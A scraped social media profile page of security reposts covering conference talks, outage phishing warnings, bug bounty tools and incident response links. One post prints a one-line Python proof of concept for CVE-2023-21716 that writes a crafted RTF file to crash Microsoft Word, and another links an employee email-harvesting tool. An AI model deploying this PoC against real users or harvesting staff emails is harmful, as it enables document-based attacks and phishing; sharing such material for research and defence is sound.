SecurityPimp.net
@security_pimpParttime: g33k/superhero/technophobe/experiment/ToughGuy/villain/paratrooper/H4K3R/camper/stereotype/student/prankster/teacher/artists/marksman/musician
Similar User
@SciaticNerd
@JessicaColaco
@revhelix
@JRBinfosec
@GuilleAngeris
@padenot
@danielbandli
@qiqing
RE: 🇺🇸 — Cybersecurity is inherently geopolitical. And as CTI analysts, we can’t ignore it. Extracting what the future holds will be a challenge. One thing is for sure, recent events will have a significant impact on the global cyber threat landscape and we have to adjust to it.
Our talk from @defcon is now available! In the presented research, we document every EDR bypass technique used in the wild along with how to detect it using new memory forensics techniques and @volatility plugins. Feedback appreciated! youtube.com/watch?v=PmqvBe… #DFIR
In case you are stuck with merge conflicts, we've curated Spotify playlist just for you! 😅
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | Don't Push To Production On Friday | |_________________| \ (•◡•) / \ / —— | | |_ |_
I don't think you guys fully grasp how big this is. Around a billion computers are bricked worldwide, mostly corporate ones. This isn't just an online service going down for a few hours. Every affected computer needs to be rebooted in fail mode and have a driver manually…
Threat Actors using the global CrowdStrike outage to spin up new domains 🌐 👁️Keep an eye out for malware posing to 'fix' the issue 🔒Malicious phishing pages posing as a fixing site #Phishing
UC Berkeley just hosted a hackathon. Over 1000 students from around the world came to build for 36 hours straight. The reward? $100k+ in prizes. Here are the winners and crowd standouts we saw at CalHacks ‘24 @CalHacks (🧵)
Reposting for my reference
LinkedinEmails Searches for employees of a company on #linkedin and generates a list of possible emails. github.com/miltinhoc/Link… t.me/hackgit/8425
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
❗Exciting news!❗ We've published nearly all the #BlueHat 2023 videos on the Microsoft Security Response Center (MSRC) YouTube channel. Happy viewing! 📺 msft.it/60195lV6Z
v0.4 of urless (a tool used to de-clutter a list of URLs) is available: ✅ Various bug fixes 🤘 github.com/xnl-h4ck3r/url… #BugBounty
Awesome Vulnerable Applications A curated list of various vulnerable by design applications github.com/vavkamil/aweso… t.me/hackgit/7655
I spent the last 6 months looking at the Kubernetes setups of over 1100 engineering teams. I summarized my learnings in a 30 page report. Packed with 💣💣s, hope people enjoy it. Check it out 👇
I found really such a weird way to bypass the 403 endpoints protected by Cloudflare! writeup coming soon 🔥😎 #bugbountylife
A list of Incident Response resources: NIST: nvlpubs.nist.gov/nistpubs/speci… CIS: cisecurity.org/insights/white… SANS: sans.org/information-se… Red Canary: redcanary.com/resources/guid…
If you are a software vendor that doesn't sign or provide checksums for your executables you are part of the problem. Do better.
I like the part about veterans. 🙄
United States Trends
- 1. soobin 94,7 B posts
- 2. Cowboys 71,8 B posts
- 3. KADOKAWA 35,9 B posts
- 4. Clippers 12,1 B posts
- 5. Texans 52,3 B posts
- 6. Eliza 12,9 B posts
- 7. Jerry 42,4 B posts
- 8. Fultz 1.529 posts
- 9. #EeveeDay N/A
- 10. Norman Powell 2.029 posts
- 11. #پاکستان_میری_پہچان N/A
- 12. Lindy 3.739 posts
- 13. Eevee Evolution N/A
- 14. sabrina 113 B posts
- 15. Cooper Rush 11,9 B posts
- 16. Keon Ellis 1.747 posts
- 17. #AskShadow 7.589 posts
- 18. Mixon 18,2 B posts
- 19. Mike McCarthy 3.318 posts
- 20. The Herta 27,8 B posts
Something went wrong.
Something went wrong.